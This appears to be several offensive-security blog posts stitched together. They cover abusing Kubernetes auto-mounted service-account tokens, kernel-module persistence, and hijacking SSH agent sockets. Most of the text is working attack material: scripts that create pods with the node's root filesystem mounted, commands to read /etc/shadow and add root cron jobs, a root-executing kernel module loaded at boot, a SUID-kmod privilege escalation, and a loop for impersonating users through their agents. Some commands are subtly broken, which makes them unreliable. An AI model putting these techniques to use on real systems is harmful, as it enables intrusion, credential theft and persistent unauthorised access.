Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently studying for the Certified Kubernetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option automatically mounts the service account token within each container of a given pod. The token is meant to give the pod the ability to interact with the Kubernetes API server. Because the option is enabled by default, it creates a great way for attackers with access to a single container to abuse Kubernetes with the automount service account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its spec. This is because the service account dictates permissions and is the identity a pod's processes run as. By default, if a service account isn't provided during the creation of the pod, the “default” service account for the pod's namespace is added automatically. If a separate service account weren't automatically created within each namespace and added to each pod spec, there wouldn't be any real resource/process separation between namespaces.
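
A quick way to see this behavior for yourself, assuming kubectl access to a cluster and placeholder namespace/pod names, is to list the service accounts in a namespace and check which one was injected into a pod spec:

kubectl get serviceaccounts -n <namespace>   # every namespace gets a “default” service account
kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.serviceAccountName}'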

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes, the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure a service account called “default” exists with a valid API bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn't exist. If the “automountServiceAccountToken” option isn't explicitly set to false within either the pod spec or the service account spec, the admission controller will also add a volume mount for the service account token to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly at “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.
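
You can confirm the mount from inside any container running with these defaults; the directory holds the cluster CA certificate, the namespace, and the token itself:

ls /var/run/secrets/kubernetes.io/serviceaccount/
# ca.crt  namespace  token
cat /var/run/secrets/kubernetes.io/serviceaccount/token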

Why is the AutomountServiceAccountToken bad?

Since permissions are assigned to a service account and all pod processes run as that service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn't much need to disable it by default. Additionally, some popular tooling has utilized the service account token to communicate with Kubernetes, so it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script, or even curl commands, we can abuse Kubernetes with the automount service account token.
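
As a rough sketch of the curl approach from inside a compromised container (this assumes the in-cluster DNS name kubernetes.default.svc resolves, which it does in most clusters):

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# list the pods in the current namespace using the mounted token
curl -sk -H "Authorization: Bearer $TOKEN" \
  "https://kubernetes.default.svc/api/v1/namespaces/$NS/pods"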

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but luckily almost all major programming languages already have Kubernetes client libraries. In my case, I often write in Python, and the Python client library can handle loading a container's service account token. With that token we can use simple function calls, like those in the following example, to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the container's local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1 = client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
    'apiVersion': 'v1',
    'kind': 'Pod',
    'metadata': {
        'name': 'busybox'
    },
    'spec': {
        'containers': [{
            'image': 'busybox',
            'name': 'sleep',
            'args': [
                '/bin/sh',
                '-c',
                "while true;do python -c '<Shell code>';sleep 5; done"
            ]
        }]
    }
}

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using the service account token to escalate privilege with a node root volume

Since by default there are no pod security policies to restrict the ability to mount a node's local root filesystem, we can leverage the service account token within a compromised container to create a new pod with a volume that mounts the node's root filesystem, using a similar script.

from kubernetes import client, config
import time

# Load the container's local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1 = client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
    'apiVersion': 'v1',
    'kind': 'Pod',
    'metadata': {
        'name': 'support'
    },
    'spec': {
        'containers': [{
            'image': 'busybox',
            'name': 'sleep',
            'args': [
                '/bin/sh',
                '-c',
                "while true;do python -c '<Shell code>';sleep 5; done"
            ],
            'volumeMounts': [{
                'name': 'host',
                'mountPath': '/host'
            }]
        }],
        'volumes': [{
            'name': 'host',
            'hostPath': {
                'path': '/',
                'type': 'Directory'
            }
        }]
    }
}

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use a nodeSelector with a label like “kubernetes.io/hostname” to try to get the new pod scheduled on a higher-value control plane node.
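
To pick a target hostname, you could first enumerate the nodes and their labels with the same mounted token, then add a 'nodeSelector' entry for 'kubernetes.io/hostname' to the pod spec above. This sketch assumes the service account is allowed to read node objects, which depends on the cluster's RBAC configuration:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# list node objects and pull out their hostname labels
curl -sk -H "Authorization: Bearer $TOKEN" \
  "https://kubernetes.default.svc/api/v1/nodes?pretty=true" | grep '"kubernetes.io/hostname"'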

With access to a pod container that has the node's root filesystem mounted, normal file and credential pillaging can take place. With write access, easier persistence methods can also be used, like adding a crontab entry or the technique from my recent post on leveraging controlled failure of systemd services, to gain a foothold on the Kubernetes control plane.
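
A rough sketch of what that pillaging and persistence might look like from a shell inside the new “support” pod, where the /host path comes from the manifest above and /tmp/beacon.sh is a placeholder payload:

cat /host/etc/shadow                                        # pillage credentials from the node
echo '* * * * * root /tmp/beacon.sh' >> /host/etc/crontab   # hypothetical cron entry for persistence
chroot /host /bin/sh                                        # or work against the node's filesystem directly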

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017, this behavior is unlikely to be addressed until API v2 is available, because it's currently required for backwards compatibility. That being said, the issue can still be addressed manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change into the admission controller, but that would risk compatibility issues and break future upgrades.
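
As a sketch, the per-namespace fix can be applied with a single kubectl patch (the namespace name is a placeholder); the same field can also be set to false in individual pod specs:

# opt the default service account out of automounting its token
kubectl patch serviceaccount default -n <namespace> \
  -p '{"automountServiceAccountToken": false}'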

Establish Persistence with a Custom Kernel Module

First and foremost, I have to admit that establishing persistence with a custom kernel module isn't the most ideal approach. Creating kernel modules isn't that easy: modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think it's a valuable learning experience that all Linux security professionals should understand. For a much easier way to maintain access to modern systems, check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are largely limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel, it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead, we can leverage the kernel function “call_usermodehelper” to execute a command back in userspace. Since by default only the root user can request that a module be loaded, this gives us command execution as root. In its most simplistic form, the source code for a module, test_shell.c, would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it in a standard C application instead. This allows the module to attempt to execute the staged application as root and still return normally regardless of what happens. The source code for a simple C execution program, named exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don't want to stage a second executable to establish persistence with the custom kernel module, it's possible to create variables for the user environment and command line arguments to be passed directly to the ‘call_usermodehelper’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "/bin/bash",        // argv[0] is the program being run
    "-c",               // -c tells bash to run the following string as a command
    "wall \"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need all of the required tools for kernel development and the current kernel's header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian-based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ on Red Hat-based systems.

Once the build tools are installed, we can create a Makefile that hands off to kbuild (the kernel build system) to compile our module. Just keep in mind that kbuild will switch to the kernel source directory and only allows includes of headers within that source tree.

obj-m += test_shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load the module directly into the kernel and ‘rmmod test_shell’ to remove it. This allows for easy testing of modules before configuring them to be loaded automatically at boot.
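
A quick test cycle might look like the following:

insmod test_shell.ko      # load the module into the running kernel
lsmod | grep test_shell   # confirm it is loaded
dmesg | tail              # check for our printk output
rmmod test_shell          # unload it again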

Once the module is compiled and tests successfully, we can copy it to the current kernel's modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to rebuild the binary tree files of all the modules and their dependencies. Without the dependency tree updated, the system won't know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have the custom kernel module loaded at boot time for persistence, we need to modify the config files for either modprobe or kmod, depending on which is used. In most cases you can easily figure out if it's a kmod system by checking whether the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If you do see that modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/modules config file. This can be done with a simple command like the following, and it will cause the systemd-modules-load service to use kmod to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interestingly, you can actually set the SUID bit on kmod so standard users can load modules as root, whereas if you set SUID on the legacy modprobe executable, it still runs in the user's own context instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation, similar to the dash shell trick I've blogged about before.
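
As a sketch of that escalation path, assuming modprobe really is just a symlink to kmod as checked above:

chmod u+s "$(readlink -f "$(which modprobe)")"   # set SUID on the underlying kmod binary
modprobe test_shell                              # a standard user can now load the registered module as root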

If it's not a kmod system, we can instead use modprobe to automatically start the custom module by creating a .conf file in the /etc/modprobe.d/ directory. The content of the .conf file should look similar to:

install test_shell

On modprobe systems, standard users can also request that a module be loaded if a valid configuration file already exists, but any code execution happens within the requesting user's context. Interestingly enough, you can have modprobe run a terminal command after loading a module by appending a command to the end of the install statement in the config file, as shown below. That could work as a persistence method as well, but there is no guarantee that all filesystems are mounted and networking has been established when the module is loaded.
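
One way that appended command might look, reusing the staged /tmp/exe payload from earlier (the --ignore-install flag keeps the module itself loading normally):

# /etc/modprobe.d/test_shell.conf
install test_shell /sbin/modprobe --ignore-install test_shell && /tmp/exe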

With all that work complete, we have established persistence, at least until the kernel is updated.

Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a lot of SSH tunneling in order to reach restricted systems. This is because it doesn't make sense to publicly expose SSH to the internet, or even to your general-use internal network. Instead there might be a bastion or jump box with SSH exposed as your initial way into the environment. After connecting to the bastion host successfully, you can then connect to another system within that restricted network, or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems, users leverage SSH agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows the SSH client to access these credentials via a Unix stream socket, so the end user doesn't have to provide their credentials multiple times. The user can also request that the SSH client retain access to the socket when connecting to another system by enabling agent forwarding with the -A flag.
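
The typical workflow looks something like this (the key path and bastion hostname are placeholders):

eval "$(ssh-agent -s)"            # start an agent for the current shell
ssh-add ~/.ssh/id_rsa             # cache the decrypted key in the agent's memory
ssh -A user@bastion.example.com   # forward the agent on to the bastion host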

With SSH agent forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The SSH agent folder is only accessible to the connecting user account. To see what agents are around on a given machine, you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Agent sockets are stored in /tmp, and the reference to which agent to use is controlled entirely by the value of the SSH_AUTH_SOCK environment variable. As a result, the root account, superusers, and possibly sudoers can change their environment variable to the socket of another connected user and effectively masquerade as them on the network. In fact, you would even have access to any of the other keys the user added to the agent. Given access to a shared system's root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp | egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/'ssh-.{10}$'/agent.<pid> # choose one and set the appropriate values as your SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even be combined into a single loop like the one below. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn't necessarily happen once a session is closed.

for AGENT in $(ls /tmp| egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT);echo $AGENT $(stat -c '%U' /tmp/$AGENT);timeout 10 ssh-add -l;done;

Note: A lot of common programs like git, rsync, scp, etc. also allow you to leverage SSH agents. So if a given agent doesn't get you access to another system, also be sure to try to use it to authenticate against common services.

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable, then use it to try to log into other systems or services as the targeted user. It's also worth mentioning that you may be able to combine the SSH agent with port forwarding to gain access to otherwise restricted systems; I've covered leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try to connect back to the user's origin system. Most of the time, the user's public key is added to their own system's authorized_keys file for ease of access.
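
Putting it together, a rough sketch of the pivot (the socket path, username, and IP address are placeholders):

export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXXX/agent.1234   # hijacked agent socket
w                                                     # note the victim's source IP in the FROM column
ssh victim@192.0.2.50                                 # ride the agent back to their origin system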

This issue is most often seen in development environments, where users traditionally have elevated system access and systems are not as well defended or updated as often as production. That, coupled with the fact that users often don't maintain account separation between development and production environments, makes development environments prime territory for leveraging SSH agents.